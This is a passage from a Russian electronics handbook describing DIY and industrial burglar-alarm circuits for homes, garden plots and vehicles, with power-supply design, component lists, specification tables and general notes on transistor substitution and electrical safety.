Номинальная частота питающей сети переменного тока, Гц............................. 50
Номинальное напряжение автономного источника
питания постоянного тока, В .............. .9
Напряжение на выводах вторичных обмоток сетевого понижающего трансформатора Т1, В:
7 и 8 ............................ .6,3
9 и 10 ............................ .5
10 и 11 ........................... .1,3
Пределы изменения напряжения питающей сети
переменного тока, В .................... .187...242 или 110...140
Пределы изменения частоты питающей сети переменного тока, Гц ...................... .49...51
Пределы изменения напряжения автономного источника питания постоянного тока, В ........ .8...12
Количество элементов ХИТ типа А373 в автономном источнике питания, шт ............... .6
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .12
Коэффициент стабилизации постоянного тока на
выходе БП, не менее ................... .120
Максимальное количество охраняемых объектов, шт . . 20
Время задержки срабатывания устройства после
размыкания контактов конечных выключателей, с . . 1...45
Ток, потребляемый устройством от сети переменного напряжения в дежурном режиме работы, мА, не более .......................... 10
То же, при работе от автономного источника питания, мкА, не более ................... .20
Максимальная мощность устройства, при работе
исполнительных устройств,Вт .............. 15
Сопротивление изоляции токоведущих частей устройства между собой и корпусом, МОм, не менее ......................... 10
Помехозащищенность, устройства при напряженности внешнего электоромагнитного поля, дБ, не менее .....................100
кпд, %, не менее .....................78
Рис. 2.8. Принципиальная схема электронного охранного устройства для приусадебного участка.
2.9. ОХРАННОЕ УСТРОЙСТВО
С УНИВЕРСАЛЬНЫМ ВЫХОДОМ
Данное охранное устройство, устанавливаемое на разнообразных объектах бытового и промышленного назначения, отличается от других подобных устройств практически неограниченными возможностями подключения исполнительных электронных и электромеханических устройств и приборов различного принципа действия. К ним в первую очередь относятся устройства звукового оповещения с параллельным включением громкоговорителей мощностью 5 Вт и более, световые или комбинированные звуковые и световые сигнализаторы, тяговые магниты, соленоиды, электротехнические механизмы. Рассматриваемое охранное устройство может выдавать с помощью ИМ сигналы необходимого вида.
Это электронное охранное устройство, целиком выполненное на ППП и ИМС, предназначено для работы в помещениях и закрытых объемах, а также на открытых площадках в условиях УХЛ при жестких воздействиях внешних климатических и механических нагрузок. Устройство устойчиво работает при температуре окружающей среды от —30 до 50 °С, при относительной влажности воздуха до 93% при температуре до 25 °С и пониженном атмосферном давлении до 5 мм рт. ст.
Охранное устройство может устанавливаться в жилых помещениях в городах, поселках, на садово-огородных и приусадебных участках, в офисах, гаражах, складах, хозяйственных постройках, на подвижном транспорте, яхтах, катерах и многой другой личной и частной собственности.
Принципиальная электрическая схема охранного устройства приведена на рис. 2. 9. Устройство изготавливается промышленным способом на государственном предприятии в виде системы предупредительной сигнализации, в комплект поставки которой входят самостоятельные сборочные единицы, узлы и блоки: БП, БЭ, сигнальные цепи и исполнительные устройства. Как видно из схемы, БП в свою очередь состоит из входных цепей, сетевого понижающего трансформатора питания Т1, выпрямительного устройства, собранного по мостовой схеме, емкостного фильтра, СНПТ и защитного устройства.
На входе охранного устройства установлены плавкий предохранитель F1, обеспечивающий защиту входных цепей от перегрузок и коротких замыкании, которые возможны при ошибках в монтаже и из-за неисправности комплектующих ЭРИ и ЭРЭ; индикаторная лампа H1 тлеющего разряда, сигнализирующая о готовности устройства к эксплуатации и о том, что напряжение переменного тока подано на сетевой трансформатор T1; однополюсный переключатель В1 типа «тумблер» для включения питания сети; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной не менее 1, 5 м;
емкостный сетевой фильтр, собранный на конденсаторах С1 и С2, защищающий от помех, которые проникают в сеть питания.
Сетевой понижающий трансформатор питания 77 унифицированной конструкции серии ТН изготавливается на броневом магнитопроводе типа ШЛ, активная площадь поперечного сечения которого должна быть не менее 8 см2. Трансформатор, примененный в устройстве, включен по схеме, которая указана выше, на напряжение 220 В. При переключении обмоток трансформатора на напряжение 127 В необходимо подать это напряжение на выводы 1 и 3 или 4 и 6. При этом можно соединить выводы первичной обмотки 1 и 4, 3 и 6. Обмотка II с выводами 7 и 8 трансформирует напряжение 5 В переменного тока, обмотка // с выводами 9 и 10 — напряжение 5 В и обмотка // с выводами 9 и 11 — напряжение 6, 3 В.
Вместо покупного готового трансформатора питания можно применить трансформатор самодельной конструкции, моточные данные которого приведены в табл. 2. 12.
Трансформатор питания в данном устройстве обеспечивает расчетный уровень выходного выпрямленного напряжения, необходимого для питания функциональных узлов, гальваническую развязку выходных вторичных це-
Таблица 2.12. Моточные данные сетевого понижающего трансформатора питания T1, примененного в охранном устройстве с универсальным выходом
пей устройства от сети переменного тока и дополнительную электробезопасность при эксплуатации. Сетевой трансформатор T1 входит в состав БП, который конструктивно выполняется в виде самостоятельной сборочной единицы. БП имеет в своем составе выпрямительное устройство, собранное по мостовой схеме на четырех выпрямительных диодах VD1—VD4; емкостный фильтр — на конденсаторах СЗ, С5, С6; СНПТ, собранный на транзисторах VT2—VT4, VT6; ИМ. Встроенный в устройство БП обеспечивает на выходе стабилизированное напряжение 5 В. Особенностью данного БП является то, что унифицированный трансформатор питания Т1 вместе с входными цепями работает в режиме генератора тока и позволяет включить непосредственно после выпрямителя VD1—VD4 стабилитрон VD6, который создает первую ступень стабилизации выходного напряжения. Выпрямительное устройство работает на емкостный фильтр, составленный из трех электролитических конденсаторов СЗ, С5, С6; собрано по однофазной двухполупериодной мостовой схеме, которая характеризуется низким обратным напряжением на комплекте выпрямительных диодов, повышенным падением напряжения, снижающим общий кпд устройства, повышенной частотой пульсации, хорошим использованием габаритной мощности сетевого трансформатора, достаточно высоким уровнем надежности и долговечности эксплуатации, большим расходом полупроводниковых диодов, что повышает стоимость изготовления. Однотипные выпрямительные диоды нельзя устанавливать на одном радиаторе охлаждения без изоляционных прокладок. Применение одной диодной сборки типа КЦ405 вместо четырех диодов значительно упрощает технологический процесс сборки и монтажа БП. Емкостный фильтр сглаживает пульсации напряжения постоянного тока как на выходе выпрямителя, так и на выходе стабилизатора, с которого снимается 5 В. Выпрямленное напряжение постоянного тока поступает на стабилизатор напряжения, собранный по компенсационной схеме на транзисторах VT2, VT3, VT4, VT6. Управляющим элементом стабилизатора является транзистор VT4, эмиттерный переход которого использован в качестве источника опорного напряжения. РЭ стабилизатора напряжения собран на транзисторах VT2, VT3, VT6. В схеме стабилизатора работает керамический конденсатор С7, который позволяет снизить выходное сопротивление стабилизатора на высоких частотах. По существу рассматриваемый стабилизатор напряжения является второй ступенью стабилизации напряжения 5 В, которое обеспечивает электропитание микросхем. Его точное значение выставляется подбором сопротивления резистора R4, а также подбором параметров транзистора VT4.
В электрическую схему БЭ охранного устройства включены три ИМС DA1—DA3, ИМ ИП1 (или сирена), работающий при напряжении 12 В, электромагнитное реле К1, конечные переключатели или герконовые реле (магнитоуправляемые контакты), индикаторные элементы, выходные цепи.
В случае применения герконов устройство может обеспечить охрану автомобиля. С помощью геркона осуществляется ввод схемы в рабочее состояние после включения электропитания тумблером В1 и замыкания контактов переключателя S3, который устанавливается на выходной двери охраняемого объекта. Если вместо переключателя S3 используется геркон, то замыкание его контактов производится с помощью магнита. Герконовое реле в этом случае закрепляется на лобовом или боковом стекле автомобиля и включается, если прислонить магнит к стеклу с внешней стороны к тому месту, где укреплен геркон, при этом включается индикаторный светодиод. После ввода схемы в рабочее состояние при открытой двери охраняемого объекта она работает, подав команду на ИМ (или сирену) через 5...10 с. Эта задержка времени необходима для того, чтобы можно было выйти из помещения или машины и закрыть за собой дверь, а при входе — успеть отключить сигнальное устройство от сети. При установке устройства в автомашине питание его необходимо приспособить от бортовой сети. Каждая из трех ИМС включает в свой состав четыре логических элемента, обозначенных на схеме (рис. 2.9). Из первой ИМС в работе участвуют два элемента — DA1.1 и DA1.2, которые образуют RS-триггер. Логические элементы второй ИМС используются: DA2.1 — в качестве инвертора, DA2.2 — двухходового логического элемента, DA2.3 и DA2.4 — RS-триггера. Логические элементы DA3.1 и DA3.4 образуют один элемент, работающий по схеме И-НЕ, а элементы DA3.2 и DA3.3 являются триггерами.
После включения устройства в сеть переменного тока тумблером В1 напряжение питания 5 В после соответствующих преобразований и стабилизации поступает на каскад установки RS-триггеров в положение низкого уровня логического нуля. В первый момент транзистор VT12 открыт, напряжение на его коллекторе близко к напряжению логического нуля, а так как коллектор присоединен к входам всех RS-триггеров, то он устанавливается в нулевое положение. Далее происходит зарядка конденсатора С9 до напряжения стабилизированного значения, напряжение на делителе, составленном из резисторов R22 и R23, будет в конце зарядки равно нулю. Это приводит к закрытию транзистора VT12, на входах триггеров появляется напряжение, соответствующее высокому уровню логической единицы, что обеспечивает устойчивое состояние триггеров.
Подготовка устройства к подаче сигналов тревоги исполнительным механизмом завершается при замыкании контактов переключателей S1, S2 и S3. При этом на входе триггеров DA1.1 и DA1.2 установится низкий уровень логического нуля, а на выходе будет действовать сигнал высокого уровня, соответствующий логической единице. Этот сигнал через резистор R16 подается па базу транзистора VT10. Транзистор открывается, и его коллекторный ток вызывает зажигание светодиода VD9, который является сигналом готовности устройства к работе. Сигнал с выхода 3 элемента DA1.1 поступает на элемент DA2.2, подготавливая его к выдаче сигнала на второй триггер. На входе инвертора DA2.1 устанавливается высокий уровень логической единицы, задаваемый стабилизатором напряжения и снимаемый с коллектора транзистора VT2, а на выходе в это время действует низкий уровень логического нуля. Это положение принципиальной схемы является устойчивым и может продолжаться как угодно долго.
В составе БЭ охранного устройства собрано два реле времени, постоянная величина срабатывания которых определяется электрическими цепями, составленными из резисторов и конденсаторов. Первое реле времени выполнено на транзисторах VT9 и VT11 и включает цепь, состоящую из конденсатора С8 и резистора R15. Второе реле времени собрано на транзисторах VT1 и VT5 и также включает в себя электрическую цепь, состоящую из конденсатора С4 и резистора R2. Первое реле на транзисторах VT9 и VT11 срабатывает через 5 с. Этого времени достаточно для отключения сторожевого устройства от сети электропитания, чтобы оно не включило сигнал тревоги. Второе реле может быть отрегулировано на время срабатывания до 30 с, в течение которого работает ИМ.
Для того чтобы возвратить охранное устройство и все элементы схемы в исходное состояние, необходимо выключить и снова включить напряжение питания от сети переменного тока переключателем В1.
В сторожевом устройстве применены следующие покупные комплектующие ЭРЭ: сетевой понижающий трансформатор питания T1 типа ТН 10-127/220-50 броневой конструкции; ИМС DM типа К1ЛБ553, DA2 — К1ЛБ553, DA3 — К1ЛБ553; транзисторы VT1 типа КП103Е, VT2 — КТ802А, VT3 — МП39, VT4 — МП39, VT5 — КТЗ0ЗБ, VT6 — МП37А, VT7 — КТ312Б, VT8 — КТ312Б, VT9 — КП103Е, VT10 — КТ312Б, VT11 — КТ203Б, VT12 — КТ312Б; выпрямительные диоды VD1—VD4 типа Д237А, VD5 - Д223, VD7 — Д223, VD8-Д223, VD10— Д223, стабилитрон VD6 типа Д809; светодиод VD9 типа АЛ102А; конденсаторы С1 типа К40У-9-630В-0.01 мкФ, С2 К40У-9-630-0,01 мкФ, СЗ — К50-6-10В-200 мкФ, С4 -К50-6-6,3В-200 мкФ, С5 - К50-6-6,ЗВ-200 мкФ, С6 — K50-6-6.3В-200 мкФ, С7 — K10-7В-25В-Н20-0.033 мкФ, С8 — K50-6-6,3В-100 мкФ, С9 — К50-б-б.ЗВ-20 мкФ; резисторы R1 типа МЛТ-2-200 кОм, R2 - MЛT-0,25-240 кОм, R3-МЛТ-0,5-1,8 кОм, R4 — МЛТ-0,25-430 Ом, R5 — МЛТ-0,125-200 Ом, R6 — МЛТ-0,25-300 Ом, R7 - МЛТ-0,125-33 кОм, R8 - МЛТ-0,25-750 Ом, R9 — МЛТ-0,25-4,7 кОм, R10 — МЛТ 0,25-10 кОм, R11 — МЛТ-0,5-5,1 кОм, R12 — МЛТ-0,25-4,7 кОм, R13 — МЛТ-0,25-2,4 кОм, R14 — МЛТ-0,25-10 кОм, R15 — МЛТ-0,125-100 кОм, R16 — МЛТ-0,125-6,8 кОм, R17 — МЛТ-0.25-300 Ом, R18 — МЛТ-0,25-750 Ом, R19 — МЛТ-0,25-33 кОм, R20 — МЛТ-0,25-4,7 кОм, R21 — МЛТ-2-220 Ом, R22 — МЛТ-0,5-82 кОм, R23 — МЛТ-0,25-100 кОм; индикаторная лампа H1 типа ТН-0,2; предохранитель плавкий F1 типа ПМ1-1А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной до 2,3 м, Х2, ХЗ типа ОНЦ-2; переключатели В1 типа «тумблер» ТВ2-1-2, S1, S2 — КП-1, S3 — КП-2; электромагнитное реле К1 типа РЭС-9; магнитоуправляемые контакты типа РЭС-42, РЭС-55.
Электронная схема БП собирается на отдельной плате, изготавливаемой из фольгированного одностороннего гетинакса или стеклотекстолита. Монтаж, регулировка и налаживание БП производятся при отключенной в точках А и Б нагрузке. Выходное стабилизированное напряжение для электропитания ИМС должно быть выставлено до значения 5В. Это достигается подбором сопротивления резистора R4, а также подбором транзистора VT4.
Основные электрические параметры и технические характеристики охранного устройства с универсальным выходом
Номинальное напряжение питающей сети переменного тока, В ......................... .220 или 127
Номинальная частота питающей сети переменного
тока, Гц ............................ .50
Номинальное напряжение автономного источника
питания, В .......................... 5
Напряжение на выводах вторичных обмоток сетевого понижающего трансформатора Т1, В:
7 и 8 ............................ .5
9 и 10 ............................ .5
9 и 11............................ .6,3
Номинальное напряжение на выходе выпрямительного устройства в режиме холостого хода, В ... .5,5
Пределы изменения напряжения питающей сети переменного тока, при которых сохраняется устойчивая работа устройства. В ........... .180...240 или
110... 140
Пределы изменения частоты питающей сети переменного тока, Гц ................... .49,5...50,5
Коэффициент нелинейных искажений питающей -
сети переменного тока, %, не более ......... .12
Коэффициент стабилизации напряжения постоянного тока на выходе БП, не менее .......... .80
Амплитуда пульсации выпрямленного напряжения, мВ, не более ......................... .20
Мощность, потребляемая устройством во время
работы, Вт, не более ................... .80
Ток, потребляемый устройством в сторожевом режиме работы, мА, не более ............... .10
Время задержки срабатывания устройства, с, не более ............................ .6
Время работы устройства в режиме подачи сигнала тревоги, с, не более ................ .40
Количество одновременно охраняемых объектов (количество устанавливаемых конечных выключателей), шт ......................... .1...20
Среднее время наработки на отказ, ч ......... .5000
Вероятность безотказной работы устройства при риске заказчика в=0,92, не менее .......... .0,97
Срок службы устройства, ч, не менее ......... .8000
Помехозащищенность устройства при напряженности внешнего электромагнитного поля, дБ, не менее ............................ .120
кпд, %, не менее ....................... .78
Рис. 2.9. Принципиальная схема охранного устройства с универсальным выходом.
2. 1. ОБЩИЕ СВЕДЕНИЯ
За последние годы создано большое количество разнообразных электронных сторожевых устройств и электротехнических изделий охранной сигнализации, которые находят все большее распространение и применение в быту и на предприятиях. Большинство электронных устройств создают производственные кооперативы, акционерные общества, малые и совместные предприятия. Производства этих предприятий, как правило, оснащаются РЭУ в централизованном порядке. Для охраны квартир, хозяйственных и бытовых построек на приусадебных и садово-огородных участках, а также индивидуальных средств передвижения: легковых автомобилей мотоциклов, каюров, яхт и т. л. могут быть применены устройства, рассматриваемые в настоящей главе.
Эта книга дает возможность познакомиться с различными типами сторожевых устройств с сигнализацией, которые выполнены на современных комплектующих ЭРЭ, ППП и ИМС. Каждая принципиальная электрическая схема в данном справочнике сопровождается пояснениями о примененных в ней ЭРЭ, приводятся сведения о тинах ППП и ИМС, номинальные значения емкостей конденсаторов и сопротивлений резисторов. Некоторые из этих сведений дается и в тексте описаний устройств, и на принципиальных электрических схемах. Элементы подбираются при настройке и регулировке устройств или при их ремонте. Для обеспечения настройки ЭУОС рабочие режимы эксплуатации полупроводниковых изделий указываются или в специальных таблицах, или на принципиальных электрических схемах. Напряжения измеряются приборами с точностью не ниже 1, 5 класса. Некоторые значения напряжений, измеренные но переменному току, приводятся на электрических схемах на входе или на выходе соответствующих цепей и каскадов. Напряжения в контрольных точках, указанные на принципиальных схемах, могут отличаться от измеряемых па ±20%, вследствие большого разброса параметров комплектующих элементов. В справочнике приведены сведения о применяемых в рассматриваемой БРЭА транзисторах, выпускаемых отечественной промышленностью, а также рекомендации об их взаимозаменяемости. Надо сказать, что наиболее доступными и часто применяемыми транзисторами является биполярные, полевые униполярные транзисторы, п-р-п и р-n-р-структур.
Замена транзисторов без ухудшения основных электрических параметров и эксплуатационных характеристик РЭУ позволяет расширить возможности повторения этих изделий в условиях лабораторий радиолюбителей и юных техников. Методы подбора взаимозаменяемых транзисторов основаны на теоретических расчетах схем и достаточно сложны для практического применения в радиолюбительской практике. Существуют методы ориентировочных расчетов и общие правила, которыми следует руководствоваться при замене ППП.
При замене транзисторов необходимо учитывать следующие основные параметры: максимально допустимое напряжение перехода коллектор — эмиттер, ток коллектора, рассеиваемую мощность коллектора, статический коэффициент передачи тока. Заменяемый транзистор выбирается из того же ряда, что и заменяющий, и с аналогичными параметрами. В табл. 2. 1 приведены ряды взаимозаменяемых транзисторов, расположенных по группам в порядке возрастания качественных характеристик. Например, транзисторы высокочастотные расположены в порядке возрастания предельной частоты усиления, а низкочастотные — в порядке возрастания минимального значения коэффициента передачи тока. При замене транзисторов средней и большой мощности необходимо соблюдать равенство или близость параметров заменяемого и заменяющего транзисторов. Для маломощных транзисторов существует правило замены германиевых транзисторов на кремниевые соответствующей структуры
Таблица 2.1. Рекомендуемая замена транзисторов, применяющихся в сторожевых и сигнальных устройствах
Окончание табл. 2. 1
Основными параметрами выпрямительных диодов являются: предельно допустимый прямой ток, предельно допустимое обратное напряжение, обратный ток и обратное сопротивление. Конкретные значения этих параметров учитываются не только при замене отдельных диодов, но и включенных в выпрямительные устройства источников питания РЭА и РЭУ.
Наряду с УОС в быту применяется множество других РЭУ и приборов. Одновременное использование в быту разнообразной РЭА требует повышенного внимания к обеспечению ее электробезопасности и нормальному функционированию при воздействии непреднамеренных радиопомех.Границы применения, связанные с электробезопасностью, строго определены государственными стандартами и основаны на опыте работы с электроустройствами.
Несоблюдение правил техники безопасности и электробезопасности в бытовых условиях при работе ЭУОС может привести к несчастным случаям. Это предупреждение необходимо учитывать особенно тогда, когда используются самодельные РЭУ, хотя известны случаи более высокой электроопасности электрических и радиоэлектронных приборов промышленного изготовления. Важно учитывать климатические условия при эксплуатации РЭА и РЭУ, работающих от сети переменного тока высокого напряжения, и особенно тогда, когда окружающая среда имеет повышенные значения температуры и относительной влажности воздуха.
При монтаже, сборке, регулировке, настройке и ремонте ЭУОС необходимо строго соблюдать технику электробезопасности и основные приемы создания и повторения РЭА и РЭУ, рассматриваемых и данной книге. Начинать конструирование бытовых приборов и ycтройств необходимо с низковольтных схем питания, подключаемых к промышленной сети переменного тока напряжением 220 В через понижающий трансформатор питания. Вторичный источник электропитания всегда должен быть низковольтным.
Одними из главных функциональных узлов бытовых ЭУОС являются источники вторичного электропитания, которые за последнее время существенно изменились, что определяется непрерывным стремлением разработчиков СИП уменьшить их массу и габариты, повысить кпд за счет применения наиболее рациональных схем и использования высококачественного преобразования энергии переменного тока, экономичных импульсных методов регулирования, комплектующих ЭРЭ, применения ИМС, БИС. Повысились требования к питающим напряжениям промышленной сети.
Эта книга не касается теории и расчетов источников вторичного электропитания, она дает готовые схемотехнические решения, проверенные при эксплуатации разнообразной РЭА и РЭУ. При изложении материала приводятся необходимые для понимания пояснения без строгих доказательств, выводов формул и математических выкладок. В основу всех материалов справочника положены результаты обобщения опыта разработки, изготовления и эксплуатации устройств радиоэлектроники ряда организаций и предприятий. Наиболее часто находят применение автономные источники питания ЭУОС, а также комбинированные источники питания и БП, в которых используют ХИТ и промышленную сеть переменного тока напряжением 127 или 220 В частотой 50 Гц. Сведения об автономных источниках электропитания читатель найдет в специальной технической литературе.
Наилучшие результаты дает использование СИП с применением ИМС и ППП широкого употребления, качество которых предварительно проверено и обеспечено наличием ТУ. К СИП и входящим в них комплектующим ЭРИ предъявляются повышенные специальные требования, определяющие заданные значения основных электрических параметров и технических характеристик. Это — высокая надежность, долговечность и стабильность работы, оптимальная точность, высокий кпд, повышенная технологичность изготовления, сравнительно небольшая стоимость, наилучшие массогабаритные характеристики
Эксплуатация сторожевых и предупредительных устройств бытового назначения осуществляется в условиях воздействия на них разнообразных внешних факторов:
климатических, механических, радиационных, биологических, электромагнитных. Рассматриваемые электронные устройства могут применяться при воздействии повышенной или пониженной температуры окружающей среды, повышенного или пониженного атмосферного давления воздуха, повышенной относительной влажности при повышенной температуре, пыли, инея, росы, повышенной напряженности внешнего электрического или магнитного поля. Поэтому при изготовлении РЭА и РЭУ необходимо учитывать большинство внешних воздействующих факторов, категории размещения этих изделий, климатические зоны страны и высоту над уровнем моря. Ниже (в табл. 2. 2) приводятся конкретные климатические и механические нагрузки, допускаемые при эксплуатации сторожевых и сигнальных устройств, при которых обеспечивается их нормальная и устойчивая работа.
Особое внимание необходимо обратить на нормированные параметры ЭМС, которая определяется возможностью одновременно функционировать при воздействии непреднамеренных радиопомех и не создавать недопустимых радиопомех другим устройствам и приборам. Параметры и требования ЭМС определены государственными стандартами и нормами допускаемых индустриальных помех.
Важность учета электромагнитных помех при создании сторожевых и сигнальных устройств определяется также тем, что некоторые новые типы этих изделий срабатывают автоматически на определенных радиочастотах и должны быть заблокированы от самовключения.
В зависимости от климатического исполнения сторожевых устройств они могут эксплуатироваться при определенных сочетаниях внешних воздействующих факторов, не превышающих предельных значений. Сочетания относительной влажности и рабочей температуры окружающей среды приведены в табл. 2. 2.
Рабочие значения температуры используются как при создании РЭА и РЭУ, так и при их эксплуатации.
Таблица 2.2 Сочетания рабочих значений относительной влажности и температуры окружающей среды для различных климатических исполнений РЭУ
Условия эксплуатации электронных сторожевых и сигнальных устройств
Температура окружающей среды, °С
повышенная 40- 55 пониженная 0 —45
Смена температур (многократное циклическое воздействие) °С —35+ 40
Температура перегрева обмоток сетевых трансформаторов, применяемых в блоках питания РЭУ, °С
не более 60
Относительная влажность воздуха при температуре окружающей среды 25 °С табл22
Атмосферное давление воздуха
повышенное кПа (кгс/см^2) 29,7 (3)
пониженное кПа (мм рт ст ) . 53,3 (400)
Вибрационные нагрузки в диапазоне частот
52000 Гц с ускорением g (м/с^2), не более 20 (196)
Одиночные удары с ускорением, g (м/с^2),
не более 15 (147)
Мнокократные удары :
с ускорением g (м/с^2) не более 40 (392)
количество ударов не менее 1000
длительность ударов мс, не менее 0,5
Линейные нагрузки с ускорением,
g(м/с^2) 20(196)
Акустические шумы в диапозоне частот 50...10000 Гц с уровнем звукового давления ,дБ не более 120
Помехозащищенность УОС в металлическом корпусе при напряженности внешнего электромагнитного поля ,дБ не менее 120 Иней, роса, пыль, плесневые грибы по НТД и КД
Режим работы постоянный
2. 10. БЫСТРОДЕЙСТВУЮЩЕЕ ОХРАННОЕ УСТРОЙСТВО
Данное устройство со звуковой сигнализацией тревоги разработано для эксплуатации в помещениях и на открытом воздухе в условиях УХЛ и В при воздействии температуры окружающей среды от —30 до 45 °С, относительной влажности воздуха до 92%, при температуре 22 °С и атмосферном давлении воздуха от 200 до 1000 мм рт. ст. Это обеспечивается схемным решением, конструкцией устройства, технологией его изготовления и примененными ЭРИ и ЭРЭ. Рассматриваемое электронное устройство предназначено для охраны жилых и производственных помещений, офисов, складов, гаражей, приусадебных построек и других стационарных объектов, а также может быть приспособлено для охраны автомобилей и другого подвижного транспорта, в том числе и водного.
Электропитание охранного устройства осуществляется от сети переменного тока напряжением 127 и 220 В частотой 50 Гц, а также от автономных источников питания, имеющих выходное напряжение 9 В. В качестве встроенного источника питания может быть использован ХИТ или аккумуляторная батарея GB1. Охранное устройство имеет простую электронную схему, собранную из комплектующих ЭРЭ широкого применения, и достаточно простую конструкцию, это позволяет повторять его в производствах малых предприятий и акционерных обществ.
Принципиальная электрическая схема быстродействующего охранного устройства, выполненного на одной ИМС, приведена на рис. 2. 10. При промышленном изготовлении данного устройства в комплект поставки входят датчики, БП, ХИТ, БЭ, блок громкоговорителей и монтажный комплект. При изготовлении охранного устройства в условиях радиолюбительской лаборатории можно рекомендовать для монтажа два блока: БП и БЭ.
Блок питания включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостную нагрузку и выполненный на одной диодной сборке, ПСН, выходную цепь для подключения ХИТ.
Входное устройство обеспечивает подключение к сети переменного тока с помощью электрического соединителя XI типа «вилка»; подключение к автономному источнику питания постоянного тока с помощью малогабаритных приборных контактных зажимов Х2, ХЗ; защиту первичных цепей охранного устройства от перегрузок и коротких замыканий и индикацию о готовности устройства к работе с помощью неоновой лампы тлеющего разряда H1.
В этом устройстве применен сетевой понижающий трансформатор питания Т1, который изготавливается на броневом ленточном магнитопроводе типа ШЛМ с уменьшенным расходом меди. Трансформатор выбран из унифицированного ряда «Габарит» и характеризуется высокими электромагнитными параметрами и технико-экономическими характеристиками. Трансформатор имеет одну катушку, установленную на центральном стержне магнитопровода, активная площадь поперечного сечения стали которого равна 6, 25 см2. На каркас катушки намотано пять обмоток: две первичные и три вторичные. Первичные обмотки намотаны на одну технологическую операцию сдвоенным проводом, имеющим повышенную прочность изоляционного покрытия. Между первичными и вторичными обмотками уложен слой медного эмалированного провода, один конец которого заземлен, а второй изолирован. На вторичных обмотках трансформатора действует напряжение переменного тока 6, 3 (выводы 7 и 8); 5, 0 (выводы 9 и 10) ; 6,3 (выводы 9 и 11);
5,0 (выводы 12 и 13); 6,3 В (выводы 12 и 14). Всем этим характеристикам отвечает покупной трансформатор типоразмера ТН24-127/220-50.
Выходной понижающий трансформатор питания Т1 обеспечивает расчетный уровень выходного выпрямленного напряжения, гальваническую развязку вторичных цепей охранного устройства от сети переменного тока высокого напряжения и дополнительную электробезопасность при его эксплуатации, регулировке и ремонте. Габаритная мощность сетевого трансформатора при полной нагрузке составляет 55... 60 Вт. В устройстве может быть применен самодельный сетевой трансформатор питания с параметрами и моточными данными, приведенными в табл. 2. 13.
В качестве выпрямителя в устройстве применена диодная сборка VD1, которая выполнена из четырех выпрямительных диодов по однофазной двухполупериодной схеме. Такой выпрямитель можно устанавливать непосредственно на металлический радиатор без изоляционных прокладок, он характеризуется законченностью конструктивно-технологического оформления, оптимальными малогабаритными свойствами, простотой применения в схеме устройства, улучшенными электрическими параметрами: повышенной частотой пульсации выпрямленного напряжения, достаточно малым значением обратного напряжения на комплекте диодов, хорошим использованием габаритной мощности трансформатора и возможностью работы без трансформатора. Но недостаток этой схемы — повышенное падение напряжения.
Напряжение, снимаемое со вторичной обмотки трансформатора (выводы 7 и 11), поступает на диодную сборку, выпрямляется и затем сглаживается емкостным фильтром, собранным на оксидных электролитических конденсаторах С1 и С2. Конденсатор СЗ служит для фильтрации высокочастотных помех.
Таблица 2.13. Моточные данные сетевою понижающею трансформатора питания Т1, примененного в быстродействующем охранном устройстве
Выпрямленное напряжение постоянного тока подается на ПСН, в котором транзистор VT1 усиливает выходную мощность БП. В базу транзистора включен резистор R2, регулирующий выходное стабилизированное напряжение в пределах от 2 до 12 В, которое при регулировке контролируется вольтметром PV1.
В качестве автономного источника питания GB1 может быть применена батарея из сухих элементов МЦ-системы, аккумуляторная батарея любой системы или аккумулятор, используемый для питания бортовой сети подвижного транспорта с выходным номинальным напряжением 12 В. При работе охранного устройства от сети переменного тока автономный источник питания отключается. Максимальная нагрузка на выходе БП не должна превышать 1А.
Конструктивно БП рекомендуется выполнить в виде самостоятельной сборочной единицы, в отдельном корпусе с соответствующими переходными электрическими кабелями, необходимыми для подключения к сети переменного тока, электронному блоку и звуковому сигна-
лизатору. Правильно собранный БП не требует дополнительной регулировки и налаживания. Перечень применяемых в устройстве покупных комплектующих ЭРИ и ЭРЭ и рекомендации по их возможной замене приведены в табл.2.14. Защита БП от перегрузок и коротких замыкании, возникающих при неправильном монтаже выходных цепей, обеспечивается двумя плавкими предохранителями F1 и F2.
Электронный блок сигнализации охранного устройства собран на одной ИМС и двух транзисторах, имеющих соответствующие цени управления. ИМС DA1 включает в себя четыре логических элемента 2И-НЕ и образует генератор прямоугольных импульсон (выводы 4...10); реле времени (выводы 1...3); устройство согласования входного сопротивления усилителя звуковой частоты и генератора.
Таблица 2.14. Перечень основных комплектующих ЭРИ и ЭРЭ, примененных в быстродействующем охранном устройстве
Окончание табл. 2.14
В охранном устройстве контакты переключателей S4 и S5 замкнуты, а контакты переключателей S1—S3, устанавливаемые на дверях, окнах, форточках, капотах и т. д.,— разомкнуты. Схема находится в обесточенном состоянии и в ждущем режиме работы. Вместо переключателей S4 и S6 могут быть применены магнитоуправляемые контакты — герконы. При открывании дверей контакты переключателей S1—S3 замыкаются и напряжение питания от стабилизатора или от автономного источника питания подается через диод VD3 на транзистор VT3, включенный в цепь усилителя звуковой частоты. Это же напряжение поступает на второй ПСН, собранный на стабилитроне VD8 и резисторе R5 и питающий микросхему. Конденсатор С5 начинает заряжаться с момента открывания дверей и замыкания контактов переключателей S1—S3 или одного из них. Время зарядки конденсатора С5 определяется величиной сопротивления резистора R13. После зарядки конденсатора С5 напряжение на входе первого элемента ИМС (выводы 1 и 2) достигнет низкого уровня логического нуля, a на его выходе (вывод 3) появится высокий уровень логической единицы, соответствующий напряжению 9 В. Часть этого напряжения, равного 5...7 В, через выпрямительный диод VD9 и ДН, собранный на резисторах R6 и R7, подводится к входу второго элемента ИМС (вывод 5). Все это приводит к самовозбуждению генератора прямоугольных импульсов. Цепь задающей частоты образована конденсатором С6, резистором R9 и транзистором VT2.
Электронная схема устройства работает, когда включены контакты переключателей S4, S6. Это происходит одновременно с замыканием контактов переключателей S1—S3. В этом случае контакты переключателя S5 разомкнуты. Напряжение питания через замкнутые контакты и выпрямительный диод VD4 поступает в цепь сигнализации, а через диод VD5 и резистор R3 — на конденсатор С4. Как только напряжение на этом конденсаторе достигнет определенного заданного значения, срабатывает второй элемент ИМС DA1, генератор начинает вырабатывать импульсы — сигналы тревоги. Частота следования сигналов постепенно нарастает по мере зарядки конденсатора С4 до максимального значения и в результате плавного уменьшения сопротивления транзистора VT2. Громкость подаваемого сигнала тревоги регулируется резистором R11.
